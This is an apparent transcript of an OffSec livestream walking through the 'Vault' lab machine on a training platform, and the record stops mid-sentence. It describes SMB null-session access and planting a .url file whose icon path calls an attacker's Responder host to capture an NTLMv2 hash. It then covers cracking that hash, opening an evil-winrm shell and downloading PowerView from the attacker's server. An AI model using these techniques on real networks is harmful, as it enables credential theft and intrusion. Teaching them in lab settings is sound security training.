We should be live now. We should be live. Hello, everybody. And my name is S1REN with Offensive Security, and we have a little bit of a special stream today. I'm going to go ahead and go over the announcements. First things first, let's go ahead and just let people trickle in. Let's let people trickle in, see if we're getting any viewership. But if you're watching this on YouTube, feel free to skip ahead to the 30-minute mark. That is when we will begin the machine. And today we're working on Vault from PG Practice. It is a pretty awesome machine, and we're gonna conquer it here. Let me actually change the title of the stream. This will be Vault Walkthrough with S1REN PG Practice. Oh, and we also want to include Hack-A-Thon. Part of the Hack-A-Thon here at Offensive Security, or at least the Hack-A-Thon preparation. So let me see if I can pull up the chat. Let's see. Hi, it's my favorite teacher, S1REN. And how does he that? Enkisto CP, Enkisto. These are hard to pronounce names, man. Cali Max 6 says, "Hi, S1REN." I'm gonna say Enkisto or Ankist. It's Ankit. Oh, Ankit. Ah, got you. Ankit Singh, man. Absolutely. Thank you, sir, for the correction, Ankit. And Cali Max, hello and welcome to the stream. So guys, this is it. Grab your coffee, bathroom break, get the laptops open, because this one is gonna be a pretty sick box. Like, this is one we are super mucho excited about here at OffSec. And we are even more excited, exponentially more excited, about what you guys are gonna do inside the Hack-A-Thon. And that is going to be awesome in and of itself, am I right? So, first time chat from NMM Ultra says, "Hello, S1REN, hello." NMM Ultra, hello and welcome to the stream. First time chat from Dark 009 says, "This is the first time on this channel. Student from India." Well, welcome. Welcome, everybody from India. Absolutely. 0xFEFF says, "Hello, S1REN. I hope you're doing good. Hope you're doing well too, buddy. Hope you're doing well too." Ah, Naman. Yes, I remember exactly who. I remember. First time chat, OOJ001 says, "Hola, my friend. Hola. Welcome to the stream, yeah?" And Mr. Mears says, "Hi, S1REN, and hello, everyone." Welcome, Mr. Mears. Welcome to the stream. Guys, go ahead and tell your friends that OffSec is doing a bit of a special stream. Spread the word about this Hack-A-Thon, because we are really excited about, like, super mucho excited about this whole thing. And, yeah, looking forward to it. Today's box is going to be Vault. It is Vault. Vault. That is available on PG Practice. So if you don't have PG Practice, that's okay. It's only $19.99 a month. If you're interested, swing by portal.offsec.com. Access to a plethora, an ocean of boxes, everything from whatever you could imagine through Active Directory. It's all there. Just $19.99. And that's for PG Practice. PG Play is a free platform that we offer that has plenty of boxes too, to kind of get you geared up, get you ready for those more kind of like our prize and trophy machines that exist in PG Practice. Hello, DePlastico. Welcome to the stream. Mr. TZ says, "From Zanzibar, I really love offensive security courses, even if I cannot afford to buy or enroll in one." You know what? In time, my friend, and if you have like something corporate where they will pay for you to advance, that looks good on their record as a company that they're advancing education for their employees. It looks really good. And also, it allows you to kind of progress. So, absolutely. But what we have here is Des Jinky. Hello from Paris, from Paris. Hello, Paris, Paris. I've never been to Paris, but I would love to see the Eiffel Tower. You know, typical shtick. I'd love to see the Eiffel Tower. Oh, oui. I used to know a girl online from France, and she would always like she was obsessed with bread making, and she would always like send pictures of her baguettes, and she'd say, "Look, my baguette, my baguette," and anyway, it was a very fun time. Anyway, welcome from France. First time chat from Darkbite9 says hello. First time chat from Can Do It 359. Hi from Venezuela, France, India, Paris, Zanzibar. Welcome everybody to the stream. Today, again, if you are trickling in, we are doing Vault. That is Vault, available on Offensive Securities or OffSec's PG Practice. And we look forward to having you. Absolutely. First time chat from Marsonics007 says JJJ. JJJ. First time chat from Nick Tal says Germany here, let's go. Absolutely. Yeah. Germany, absolutely. Let's get it. And everyone's starting to trickle in. Excellent. We had pretty interesting attendance on this one. Naturally, pretty interesting attendance. And it's going to be a super sick machine, man. Like I cannot even begin to describe. Like I'm very excited about this. Apologize for the inconvenience yesterday. I just want to go ahead and say that, apologize for the inconvenience yesterday. Yes, we are aware, all of the servers went completely down. We understand that there were some outages and that they've hopefully been resolved. If you're still having issues, please reach out to our support department and we'll work directly with you. No problemo. We do apologize for that inconvenience. Aside from that, let's take a look here. Is there a way for me to pop out the chat? NMM Ultra says, should we complete PG play before diving into PG practice or buying it and doing it side by side? Dude, I mean, this is up to you, my friends. This is up to you. How many boxes do you think you can get? Do you want to do some Windows machines, Linux machines? These are questions you've got to ask, my friend. These are questions you've got to ask. All right. I'm going to try and find a way to pop out this dang chat. There's got to be a pop. Oh, maybe it's in settings. Anybody know where the button is? Here I am teaching students and I can't even find the dang button for Twitch chat. I'm so embarrassed. Where is the pop out functionality? Shield mode, mod view, chat settings. There's got to be just a regular old pop out button. Collapse. The cog at the bottom. Switch to not mod settings, chat settings. Okay. I selected the cog, but that's just chat settings. Oh, there it is. Pop out chat. Ah, my friend. You have done me wonders. Thank you so much for that there. Absolutely. So, how's everybody doing? Happy Thursday. First off and foremost, happy Thursday and welcome to the stream. If you're still trickling in, let's go ahead and give the intro one more time. Welcome to Offensive Security Stream. We teach live hacking walkthroughs here. We teach methodologies. We get people inspired. We bring them together. We educate them, and so on and so forth. This is like my prime directive, any Star Trek fans out there. So, let's go ahead and see. If I pay a month for PG Practice, can I participate in Hack-A-Thon? Or do I need to learn subscription? No, PG Practice is separate. Our Proving Grounds platform is totally separate, man. It's only like $20 a month or something like that for access to machines from OffSec themselves. So, Koaf Ash says, "Hi, S1REN. Happy to see you or happy to hear you again. How many winners will be there?" So, talking about the prizes, I am glad that you brought that up. I'm going to go ahead and paste it. Guys, head on over to the official Discord server and go into the general chat. Okay? General chat, please. General chat, everybody, on OffSec's Discord. General chat. And these are the prizes that we're going to be giving out here. Those are very real prizes, up to, what was it, like, I want to say $15.99 in value, something like that. So, yeah, straight up the entire course in value. I know somebody said they were looking, to get the course. This is your chance. You can absolutely shoot for that goal, and we'll give you that full ride through any one of those courses if you pass and get into first place. So absolutely. Absolutely. Let's see. What else can I share with you? If you have any questions pertaining, I had a link here. I had it saved. I knew people would ask. Un momento, por favor. Let's put this in here. There you go. And I will also link that in Discord. Let's grab general Discord or general chat. Boom. So if you have any questions related to what the heck is going on, Hack-A-Thon, frequently asked questions, there is the link. You can access that straight away. Straight away. All right. Let's see here. How do I open up just the chat? There we go. Popped out chat. Boom. Yes, finally a hacking stream without background music. I mean, I don't know what else to tell you. We're here to educate, we're here to inspire, and we're here to bring people together and make a much more secure future and secure world. First time chat from Cramps LOL says, heart will heart back. All the love, Cramps. All the love. Requiem 2099 says, boom. Reminds me of that POD song. Anybody remember POD, like back from the 90s, early 2000s? Boom, here comes the boom, ready or not. Here comes the boys from the south. Boom, here comes the boom. Ha ha, how you like me now? I said. It's a classic one. I think they even played it at the end of one of the Fast and Furious films when I was growing up. But aside from that, no lo-fi, none of that, man. We got no music. You can just imagine, I don't know if you guys can hear the echo. Just imagine that I'm sitting on the floor in a server room. I got a couple of dinky wires. I'm plugged in, and I got this microphone here, and we're just gonna go through absolutely hacking and cracking these things, man. We're gonna go through these wires. Ready or not, here comes the boy. That is how the lyrics go. Yeah, ready or not. How you like me now? So, 100 viewers, welcome. I see we're climbing. I've got to repeat. Welcome on behalf of Offensive Security, or now known as OffSec, however you like it, however you prefer. Welcome. This is a stream dedicated to proactive security. I do not know what else to say about that. We provide methodologies for ethical intruders and for people interested in the proactive sector of security. So we're going to be doing some live hacking this session. If you're new to this, don't fret, don't be intimidated. In advance, please hear me. If you are new to cybersecurity, or really security, proactive security, if you're just new, that's okay. That is okay. Everybody was new once. And I just want you to know, I'm speaking directly to you, the new person who's never even been here. Listen to me very closely. A lot of the stuff in the stream is going to be very intimidating because this is not an easy machine. This is a difficult machine. So don't feel pressured, like you need to, follow along, understand every single little thing that's going to be happening. Don't feel pressured if you're new. This is a career. You know what I'm saying? This is not a sprint. This is not like the Olympics, 100-meter dash. This isn't that. This is a marathon. This is a career. This could potentially be your life, and we'd love to have you in the world of proactive security in the proactive sector. Aside from that, To everybody else who is seasoned, welcome back. Bling bling. And we're going to get that bling bling today. You know who you are. And I'm looking for all the comments in the chat. I actually got the chat set up in a nice way on my computer here with it popped out. So it actually looks pretty good. And I should be able to blow it up kind of like this. And follow along with you guys. If you ever have any suggestions, right? Any suggestions on attack vectors, things like that, let me know. Let me know. Let me know, because that is how we do things around here. I take suggestions. I want to formally apologize that I was not able to do the stream yesterday due to technical difficulties. However, don't think that you lost any Active Directory machines, any fun PG practice machines. They are not lost. We will go over them. And it will be covered by me personally at the beginning of the next month, formally the first Friday of each month at 2:30 p.m. Eastern is when we stream these sessions. That is when we're going to do the next box. So fret not. We are going to make sure that that is covered. First time chat from .255, our beginner here. Yeah, or one beginner here. Welcome. Welcome, .255 of this date and this time. Maybe you'll be a Navy SEAL Kraken soon, huh? And Ankista says, I'm not new here, or I'm not new, but I'm here to sharpen my skills related to the CTF. That's what this is for. That is what this is for. That is the literal point of this whole thing. You hit the nail on the head. Nail on the head. Let's check the time. It is 2:47 p.m. Eastern Standard. So we have 13 minutes to go, guys. 13 minutes. Everybody go ahead and log in if you have PG practice. Get your cherry tree open. Get your IP, the target IP exported as an environment variable. Be ready to rock, be ready to roll. And let's see. Syfy says, I have an OSCP, but these videos are great refreshers. Because that's what's up, man. That's what's up. That's what we're trying to do around here. We're trying to help people. I'm actually going to grab my water before I forget. Or should I get... I know Summers would say, Siren, did you get your mocha? Did you get your mocha? I actually did. I got one of those Monster energy drinks, but they're the mean beans. And it's like a mocha kind of energy drink. I think I'm going to go grab one of those. I will be right back. All right. Anybody? I got 2 mochas in me. Let's go. Syfy, are we on the same wavelength? What's happening, buddy? Because listen. I got the mocha too. It is Mocha Thursday. Coffee will suffice. Let's get it, boys and girls. Let's do it. Not new to InfoSec, but need to seriously up my cyber skills. Requiem. You are in the right place, my friend. That is kind of what we have been specializing in for a very long time at Offensive Security. That is what we take pride in. That is what we love. That is what we bleed. And it is that proactive nature that I think is what makes our company so great, right? And we're always proactive with our community. We're proactive with getting content out there, with everything that we do. And I couldn't be happier to work anywhere else. This is one of the greatest companies I've ever worked for. First time chat from Gaming Tech Nil says hello. Hello, Gaming Tech Nil. Welcome to the stream. Beginner, intermediate, or advanced, Gamer Tech Nil? I'm going to call you out. First time chatter. Would you say you're a beginner, intermediate, or advanced when it comes to hacking and cracking, spoofing and coding, debugging and scanning, delivering the goods like your name's Peyton Manning? What would you say? A little bit of a demographic check here. Intermediate. Okay, well then this is right up your alley, man. This is what you need. Because this is actually a difficult machine. This is an advanced machine. So this is like that bar for you. This is gonna be good. Looking to see this. I'll be checking and eyeing those suggestions from Gaming Tech Nil. And let me just go ahead and prefix this. If you guys give a suggestion that doesn't work, that's okay, dude. Like, this is a community-driven stream. I'm not just going to pwn this box in like 20 or 30 minutes, you know? That would do nothing to teach you. That would do nothing to help you. And ultimately, it would probably do worse. So I'm not here to show off. I am here. I just want to explicitly state that I am here to help you guys. So that's why I wanted to pop this out like into a box to make sure that we're all checking with each other on our notes on this box with vectors. I will just be your guide. I want you guys in the chat to think of yourselves as like the people. You are the red team. You are on an engagement and this is your box. This is your target, right? This is the victim machine, whichever one is tossed up, whatever the IP is. And I am just the one inputting the commands, doing the basic stuff. So from EJ Nixon 77, got the offensive security or OffSec certified professional certification November of last year, but still considered myself beginner. Looking forward to this box. Heck yeah, man. Okay. Surinello says, last time I saw Steiner stream here, I was completely blown away. Senior IT guy, understand a lot of attack vectors, but totally beginner when it comes to the discipline of a pen tester. You know what? We used to have a saying. I don't know if we officially say it anymore, but, you know, twixt me in the chat, twixt me in the community, we used to have it in our material back when one of my personal heroes and the founder of offensive security, he said, and he taught me this mindset, right? Think like a lazy system administrator, right? Think about that for a second. Try thinking and imagining this and security from a lazy system administrator's perspective. What does that mean? That means you're looking for misconfigurations, left behind files, unsanitized input fields, left behind miniature applications that were good for development for a period of time. Various ports that were left open, secret keys, port knocking sequences, whatever it might be that a sysadmin might typically do in their day-to-day job, make sure that you're thinking like a lazy system administrator. And that's pretty much my response to that. So yeah, even if you're advanced in information technology and what we do here on these streams impressed you, then just think of it like that, from that perspective. Maybe that'll help act as like a mental bridge. We're like the people that think like the lazy system administrators, the lazy defenders, that kind of a thing. Because even one hiccup is enough for us. So let's see what we got. Just to have some, I just don't have the patience for CTF. Any suggestions? Get some coffee, man. Get some music. Get hacking and cracking. I don't know what else to say. It helps to have been a lazy sysadmin in the past. Actually, that was, you joke about that, but I think that was legitimately one of our advanced prerequisites for the OSCP back in the day, is we would say, some Bash, some Python, some TCP IP knowledge, and if you had any knowledge of, and then, additionally, right? Additionally, if you had knowledge of C, or if you had Windows domain administration, Linux systems administration, or both, then you're probably going to fly through the course, man. Fly through the course. So if you have a sysadmin background, then you are in the right place. Absolutely in the right place. Thank you for the advice. My pleasure. My absolute pleasure. Absolute pleasure, guys. And tomorrow, Excuse me. Tomorrow, we have a stream from Siddiqui. This is not over. Guys, like, please, this is not over. Tomorrow, we have a stream from one of our student mentors. You guys might even remember him. He did a couple of streams in the past. Siddiqui will be streaming another machine. I'll leave it to them to announce it, or you can check the box in our events on our official Discord server to be reminded of when he goes live. Because even when S1REN is done streaming, Siddiqui is going to come in and conclude the preparation for this event. Let's go ahead and check the time. Guys, 5 minutes on the clock. 5 minutes. Tick-tock. You're on the clock. Give it all you got. Tick-tock. Knock, knock. 5 minutes. 5 minutes to log in. 5 minutes to get the machine booted up. Again, we are doing Vault from PG Practice. Make sure you got your cherry tree, your Emacs, whatever it is. Make sure you got it open. I'm sorry. I've been watching too many comedic videos related to Emacs lately. So many. So many, so many. Your Emacs just finished patching? I do my mail with Emacs. You know, how does he say it? I do my mail with Emacs. I do my taxes with Emacs. I play Tetris with Emacs. I blog with Emacs. Emacs is like a second job. It's a fully, completely hackable text editor. And it is actually hackable. You can use that to get root priv if it's any sysadmin that was using Emacs and they left it on the machine. You can actually either as sudo, you can launch Emacs and modify the sudoers file to give yourself all permissions and sudo switch users. And with the help of Emacs, you've gained root privilege. That is ring 0. Play Battleground, please. Please pay attention to my question. Which question was that? No issue. Then again, I'm asking, CEH, and now I'm doing Hack the Box and planning to buy Pin 200, but I'm literally confused. Learn 1 versus normal 90 days. Please suggest. Honestly, if you have any questions, just reach out in our Discord. Absolutely. Or if you have any further technical questions on getting yourself registered, all the technical details of a purchase, orders at offensive, is it still offensive-security? I think it is. Our domains should resolve. So it's like orders at offsec.com or orders at offensive security. Thank you for reminding me. I actually have to check that now with the new brand. But 2:58 p.m., guys, less than 2 minutes on the clock. Less than 2 minutes. Are you guys ready? Come on, chat. All is one. Are we ready to hack and crack this machine? Are we ready? Are we ready? Is it gonna happen? I see one person saying they're ready, 2 people saying they're ready. What's going on? What's going on? We're ready. 1 more minute. 1 more minute and we're gonna get it. Shuriken says, ready, let's go. Ready, fire, let's do this. Ready. Okay, you know what? We're gonna do it early. Oh, it reminds me of the Ilmaida Hobson. All right, let's get it. And we're live. So, as always, everybody, I have exported. If you see, I'll export my target IP. Inside the terminal here, you'll see my VPN connectivity down here. I like to keep that there just to monitor it, monitor my connection to the network. If I'm sending packets and it breaks during an engagement or something like that, I like to just see that it's there. That way I can cut, I can kill the fuzzing or whatever it is that we're doing before it gets too bad. So it's just a general trick. What we're gonna do is start with nmap. We're gonna do an nmap -p-sv. That's for service version, -sc for simple scripts, at the target IP and tac open. Can anybody tell me why we're interested in the tac open? Why do we if we're scanning all 65,535 ports, why are we interested for the beginners out there? Well, we can do it, you know? Let's teach them. Why are we interested in dash open? Syfy has it, Gerby has it, Darkbite. Skip the filtered ports. We're running scripts. We don't want to run scripts against filtered or closed ports. We only want to test open ports, but we want to make sure that it also speeds it up, right? It's just for the sake of getting it done. Now, this scan could take a little while, so I'm just going to mute my mic. Then we'll get the nmap results in a cherry tree, and we'll start dissecting it, like with a scalpel. About 36% done here, or 45. It's going. Oh, I know I'm muted. I know. Can anybody tell me, speaking of these environment variable things, man, can anybody tell me why we would want to use an environment variable during an engagement? Or during an engagement? Anybody? Extra credit. Why would we want, as a team, to export on, say, a shared resource box and make sure that everything's going? Why would we want that? So you don't mistype the IP. That's correct. That is one such thing. We don't want to hit our target wrong. We don't want to be off by we don't want to do what sysadmins call fat fingering. We don't want to fat finger it. So, number 2, what is the next reason? This. The answer is the tools and methods that we utilize. So all of these things are going to either take an endpoint URL, right? Like export the URL environment variable, or an IP address just straight up. Either way, it is incredibly useful to be able to just, instead of typing it out or looking for it, going back to your notes, to just have it in your terminals and be good to go. Bada boom, bada bing. This must be a big machine, man. This is a honker. 99.41. Okay. My notes are the best. Hopefully I don't disappoint you then, because we're going to dissect this machine with a scalpel. Don't worry, I'm going to teach you all the tricks. So if you're using Terminator, let me just show you. Control-Shift-O will split that terminal and make a new one. Control-Shift-E will make another one there. And that's how you do that. I'm going to show you some shortcuts in Cherry Tree as well to show you how I quickly highlight everything. And I really am sure you could probably automate this with a script somehow. Maybe Python? I'm not sure. It's HTML formatting. But nonetheless, right under nmap results, this is a little hard to read for me personally. I like to not mess around. So I hit Shift-Alt-B and then Enter, because my default background color is black. Now I want to highlight the ports, services, leaked information that we got from banner grabs, anything that we can, OS information, domain, like now we know it's vault.offsec is our target, vault.offsec. So let's go ahead. We got domain, Shift-Alt-F. I set that to a bright red color, something noticeable, and we select that, right? And we're going to go down the list. Next, we have Kerberos, okay. Microsoft Remote Procedure Call, 139 and 445, NetBIOS SSN. That means we got some SMB or server message block protocol going on. NC, AC, and HTTP over 1.0. That is pretty standard here. A TCP wrap 636 is also standard. We'll go over that in a bit later. Lightweight direct access protocol. Okay. We may have to do some exploration there. Check out some config information. 3389, that's RDP. Does that mean, I get to show an additional trick. dc.vault.offsec. .vault.offsec. Boom. Let's take it apart. Don't mind me, I'm just gonna go through this, do some highlighting, and then we'll kind of, wrap around. Oh goodness, did I open 2 cherry trees? I did. There we go. And boom, boom, boom. And honestly, what stands out, what looks like weak fruit, low-hanging fruit, we have SMB2 3.1.1 message signing enabled and required. Okay. And OS guess is Windows. I'm going to trim that up because I'm going to show you guys a little trick. Whenever you're going up against a Windows machine, right? And you need to know exactly for payload reasonings, kernel payloads, potatoes, whatever it might be, you want to know exactly what you're going up against. A lot of machines up through like Windows Vista 7, and even like a lot of Windows servers out there, if you type our desktop and just the target IP, watch this. What type of machine am I going up against? Just RDPN, dude. We're not going to be able to log in, but look at what info we got. We got DC/root, requiring a password, sign into DC, and this is obviously like what? Windows 10 based? So thus far, that was just a simple RDP. We connect and disconnect. So I'm going to go up here and put that the OS is what? Windows 10? We can maybe find out if it's Windows Server later, something like that. But let's go ahead and go over this. So 53, we have Simple DNS Plus. I see Kerberos standing out. RPC, that's Remote Procedure Call. NetBIOS SSN, that's 139.445, man. You better commit it to memory. That's SMB, baby. SMB all the way. And then we have lightweight lightweight direct access protocol, or Active Directory for short, or however you like that. More RPC and HTTP standing out, so something we can get in the browser. Anything TCP wrapped is going to stand out because we want to netcat into these things, see if it wasn't something like a janky server that the admin left behind to access something like a backdoor. More confirmation of vault.offsec on the domain. That is mucho importante. And, this is just like, it's like your field of vision or your peripheral vision. This is going to help you instead of just seeing a bunch of white text. It really saves you time. DNS domain name, again, there it is straight up from 3389, RDP confirmed, vault.offsec. And it's looking good. .NET messaging frame, or .NET message framing. We have more HTTP, but without getting into the technicalities of why 49669 is open, let's go up here, right? Let's go up here and let's just add another column and call this community attack vectors, or our to-try list, right? And then I'm going to go ahead, now that I'm done with all my highlighting, the Nmap scan is done. You guys know the drill. So, yes, as my old chemistry professor used to say in college, he would smack the whiteboard and say, mucho importante. In other words, it's on the exam or it's on the test. Now, that does not mean any of this is going to be on any of the Hack-A-Thon tests. But he used to smack the board with a stick and say, mucho importante. Mucho. And I'm to an entire English class, man. What a wonderful professor he was. So, let's take a look at the chat. Sounds crazy? Yeah, they're scary? Yeah, no, he was awesome. No, he was great. He was great. Enumeration of LDAP, extracting system users passed. Dude, Gaming Tech Nil, I like where you're going so much right now. So we see LDAP. We got LDAP up, right? Let's add 389 LDAP. And what did they say? They said enumeration of LDAP. You know, see if we can extract system users, passwords, or key phrases, things like that. So that is one we would do. Syfy suggests doing an nmap LDP star or LDAP star. I am going to one-up you here, Syfy. I'm going to one-up you, buddy. What we're going to do in line with Gaming Tech Nils is, this is the reason here, look. If I say, you know, nmap, let's just drop the ports. Let's just keep it to the scripts. -sv service version --script, right? And I say equal to anything LDAP star, that's going to run brute forcing. Think about it. Think about it. We don't want to sit around for ages on a brute force, right? No bueno. No, thank you. No, thank you. Yeah, true. That would be slow, right, Syfy? Right? So what do we want to do? What do we want to do? Check this out. We open it up, we drop the equal sign, and open up double parentheses. Then we say LDAP star. You're right. But we also encode and not brute. So this will tell nmap and not brute will launch all LDAP scripts for enumeration and not the brute force ones. I told you, man. You guys would be learning something from this stream. So, with that being said, then we just launch that at the target IP, and let's see what we get. Let's see it. Oh, buddy. We got a bit back this time. Okay. Hello. Hello. See what a simple little nmap script can do for you. What about it? How about it, guys? So I'm going to put this under other. Just, you know, other. And boom, I'm going to drop all this in. I'm not going to get too crazy with the highlighting. I'm just going to select it and make it legible so everybody on the stream can see it. It stands out to the eye. The background is pure black. Foreground is white. And, you know, we have some good information here already that we were able to exfil from the target because of basically guest credentials for lightweight direct access protocol or something equivalent to like a null session, right? And more or less the same information up here, but I'm going to go ahead and copy it. And we'll get all of it over LDAP results, root results. And this is like our enumeration, man. We really could pour through this. Is it anything too useful? I don't know. Did we get any users? Heck no, it does not look like it. We did not. But that was a good suggestion, both of you. That was a great suggestion. More vault.offset confirmation, at the very least. And at least we're being thorough, right? But we are getting the configuration, which for other attacks might be useful. You ever need that LDAP configuration, now you know the command. So let's see. Up here, what are we going to do next? We had 389, 5383. Not really too much interesting HTTP. Someone says SMB client. Enumerated all services and ports. Okay, you guys want to try enum for Linux? What about this? What if we try nmap -p139 445 script is equal to smb enum shares at the target IP. Fingers crossed. Oh man, it didn't come back with anything, guys. It didn't come back with anything. This is not good. How are we going to get into this machine, dude? How are we going to get in? Make a small script. Shell scripting it. -sc. Oh, okay. All right. Let's try it. But I think, well, we'll see. I'm going to take a sip of my mocha. Doesn't look like SC worked. That would be simple scripts. There is another way. There is another way to do these things. And I saw one person mention it in the chat. There's another way to get these things. Have you guys heard of enum for Linux? Everybody knows enum for Linux at the target IP, right? When you see 139.445, why would you not run enum for Linux? Let's run enum for Linux and see what happened. Why did the nmap script fail, right? What happened? It shouldn't be taking this long. Can't find workgroup domain. NBT stat information. Nah, man. Yeah. No. Server doesn't allow sessions using... Okay. Caramba. So, there is another way. There is another way to do this. Check this out. What if we use SMB client and we just tack on tac L, right? Let's echo the IP, SMB client, tac L for list out shares at 192.168.207.172 / and let's just see if this works. Hopefully it doesn't need a password. Oh, there it is. There it is. There it is. Okay, so we've already got something. We have found something useful. In fact, I'm going to put this at the top so I don't have to keep scrolling. At the top, man, of our other enumeration, right? Now, God, look at what we got. So, documents share, admin, C and IPC, net logon named pipeline. So this is looking promising. Seeing a named pipeline like that, I'm thinking already, like, what is S1REN thinking when they see net logon? I'm thinkingmpacket. I'm thinking, maybe PSExec. I'm thinking things like that would require a named pipe to be open, right? So that's what goes through my mind, at least. But documents share. This is the one. Make no mistake. Woo-ha. We got a document share. And that is going up here. So for 139.445, SMB, booyah. Look at what we got. Nice, huh? Nice, nice. And remember, we got that with SMB client-L to list at 192.168.207.172, right? And don't worry, I'll include all of these notes in the Discord server. And if you missed any of it, don't worry. You'll be able to either rewind here on Twitch or rewind on YouTube. Looking at the chat right now. Yeah, obviously, Syfy, we freaking got it, man. We got to look at that documents shared like ASAP. But let's look at the chat. OX Clayhack says null access. So I would enum users with cracked map execute. Okay. That's a little loud. A little loud. There might be other options. But I like it. GerbySec, I love cracked map execute. It's one of my favorites. Gaming Tech Now says, oh wow, heck yeah. And I can't even pronounce that. 0PC0D3XCC says, but why did the nmap and enum for Linux fail? That's a good question. The reason is because it's checking explicitly for null sessions. It's like directly trying to connect and then list it out, as opposed to using server message blocks built-in list functionality. So I'm pretty sure that's how it works. But yeah, so it was straight up not working. Like, If it would check for IPC star, it would try to log in to admin star, C star. Like these are things, right? Even just IPC, right? Back in the days of like W7, Windows 7 -N, can we log in unauthenticated? We can. So we're logged in, but there's nothing gets listed, right? So we have no authentication on IPC, but we found another share. Let's do documents share, right? -N, and let's give it a go. We're in. Okay, so SMB null session on documents share. And I'm gonna grab this, copy this, and looks like we're gonna go right, still under 139.445, right? Still under all this. Yeah, I'm gonna include a little dollar sign here because these are like off the command line landmine. But yeah, so we got, whatever, it'll look better later. Documents share. What do we want to do? What can anybody think of? What type of attack might we be able to carry out with access to a share on a Windows machine? The share name is documents share. I'll type that into the poor man's text editor. Documents share. There it is. What is another type of attack? I'm looking. Get NTML from responder. I'm liking it. SCF possibly. List contents. File upload. I'm liking what Mudassar says. Can we get file upload functionality? I like it. Let's go to files. By the way, this is my directory structure. Files, hashes, passwords, users, and vulns. Let's go into files and we're going to touch testing.txt. And let's try an SMB back in to documents share and see if we can list out. We can. Now, can we put testing.txt? We can. We can. And there it is. So what we're going to do is a little bit of a trick. Well, let's try somebody's responder first, right? Let's do responder dash I want a responder like running, man. Ton 0, and we'll say be verbose. Be verbose. What happens if I try, so there it is. Responder is running. It's just that simple, right? Here we are. Here's the command. We got responder running. And can anybody tell me what we might be looking for here? What happens if I try to put testing.txt again? Putting file. Okay, but we didn't get anything. Can I delete testing.txt? Can I try putting testing.txt again? Maybe it didn't overwrite. No, we're not getting any NTLM back. Dang it, man. Dang it. Dang it, dang it. Son of a devil. I know what you guys were thinking. We'll just upload it and get the NTLM hash. Oh, it's all over. It's the end. It's not the end. We still got more options. We got more tricks up our sleeve. Check this out. Let's delete testing.txt. And there's a little bit of known witchcraft or sorcery associated with SMB. What we're going to do is make something called an icon file, or a type of like URL shortcut. So what we're going to do is we're going to touch, I don't know, offsec.url. Let's nano offsec.url. We're going to call this internet shortcut. Below that, all this information can basically be anything. URL, literally just, we'll type anything. Working directory equals anything. And then we need the trick, which is icon file. You guys know all those little icons, right? //, and we'll grab the responder IP, right? The responder IP address. And then what we're going to do is %username %. Can anybody tell me what this would do in Windows? if I'm on Windows and I type echo username, what's it gonna give back? What's it gonna give back? The user's name. That's like an environment variable, right? Echo %username %. So think Windows here. So we're saying basically icon file is located at our responder IP / whatever your username is, achoo. And so we're looking for that username exfiltration as well. And then we'll have it as .icon. And then we'll set the icon index equal to 1. Okay? Now we're going to save that. Cat offsec.url. I'm going to remove testing.txt. Looking good, looking good. And the hood. And we're going to go to here. And we're going to list this out. And we're going to put offsec.url. And if we're correct, chat, if our, yes, exactly like that, 0x clayhacks, icon resource / attacking IP / AA. In this case, we're gonna grease that username, right? Or at least attempt. So we also enumerate the current user. Nice, precisely, my friend, precisely. It's like, by the way, also gonna grab that. Pudding file, hello. Boys and girls. I gotta take a sip of my mocha. That is a username and an NTLM v2 hash. Without hesitation, I am gonna copy that, close responder. We're gonna nano our hashes file, and I'm just gonna paste it in. That is all I'm gonna do. I'm gonna paste it in. Look, cat hash. Well, can I spell it correctly? Yes. Cat hashes. Oh, dang, man. Isn't that good? Chat's loving it. Pretty sick. Pistolero, eh? Pretty nice. Pretty nice. So, we can exit and terminate our session from server message block by typing exit. And now we need to do what? What are we going to do with that hash? Why? What are we going to do with this hash, guys? What's happening here? Well, I mean, I have a big old hash. Hydra, John, I love it. Thank goodness we got some seasoned people in here making this too easy for me. Making this too easy. Come on. Too easy. So let's do this. We're going to run John on hashes -- word list is equal to user share wordless rocku.txt. And my fingers are crossed. My fingers are crossed. Yes! Blow this up, man. Blow this up, man. Take a look. Take a look. Dude, come on. Come on. How about it? How about it? So we got a password and a user. I'm going to nano users and put Annie Rude in here. And then we're going to copy the password, nano passwords, and paste that in as well. Hot dang. I mean, guys, this community, we'd be like a lethal red team, man. If we were all on one team, I'm just saying, we are nailing this machine. Easy peasy right now. Offsec.url is the best URL. I love it. Good memes, good memes. Finally, some has correct from me. Absolutely, Gaming Tech Nil. Heck yeah. Heck yeah, heck yeah. Some people say RDPN. I want to introduce another tool that I'm a big fan of that you'll find on my blog. It's SirenSecurity.io. But yes, Clayhacks has it. He was the first to it, dude. WinRM, or should we say evil WinRM? We're going to use evil WinRM, and we're going to go, okay, like at the target IP, right? -I for IP, -U is Annie Rude, and -P was, what was it? Secure HM, I think. It was all caps. Let me cat passwords. Secure HM. I just don't want to mess this up. It looks good. And guys, I think we go ahead and just kind of grab a shell. Now let's echo username. Or who am I? Yeah, PowerShell. So that is what we call bling bling. You know, that is, make no mistake, that's what I call the bling bling. Look up exploit76.c on the exploit database if you're curious. Summers is here. Summers, I was hoping you'd show up. I got my mocha, Summers. I got it. I got my mocha this time. And she joined just in time for the bling bling. Just in time. Now, guys, we're a real system level user. You guys remember my rules, you know, what we teach here at OffSec. If we're a system level user and we're not www data, what is the first Linux command that we would want to type as a real user, right? Let's pretend I'm Callie. Sudo-l, right? Sudo-l. Exactly, precisely. What is the equivalent? If there ever was an equivalent of that on Windows, what is that? Because when I get a Windows shell out of the box, it's the first thing I type. It's the first thing. I see one correct answer in the chat. Who am I from Akush? And Ziad, you guys got it. Who am I /priv? Oh no. Oh no. It's all enabled. No. It's all enabled, dude. Reboot privileges. It's beautiful. It's beautiful. I might cry. It's gorgeous. Okay. This is good. But what do we want to do? No. It's not potato time. Guys and gals. This is not potato time. This is, we're trying to prep for the Hack-A-Thon here. You know what I mean? We're trying to teach some things. No potatoes just yet. But let's think. Salmon system files, I like it. Running processes, absolutely. We can check that. Task list. What's it? Unless I got disconnected. Nope. Oh, I know why. Access denied. Okay, that's fine. That's okay, and CLS is not going to work either. But let's go here. Let's go to the root directory, right? And I'm going to make a directory called maintenance. Because I'm doing maintenance on the machine. Perfect. So any files that we end up uploading, we're going to end up uploading here. One such file, if I cd to files, I'm going to use the locate command powerview.ps1. Powerview.ps1. And I have that in my transfers directory, right? And let's go ahead and do a simple, or we'll copy it here, cp that here. And there it is, powerview.ps1 in our current working directory, right? Now what I'm going to do is do simple HTTP, and we're going to copy the IP, and we're going to curl HTTP, my IP, port 8000 /powerview.ps1 dash output into the current working directory is powerview.ps1. Should give us a code 200. There it is. We got it. All right. We're good. So 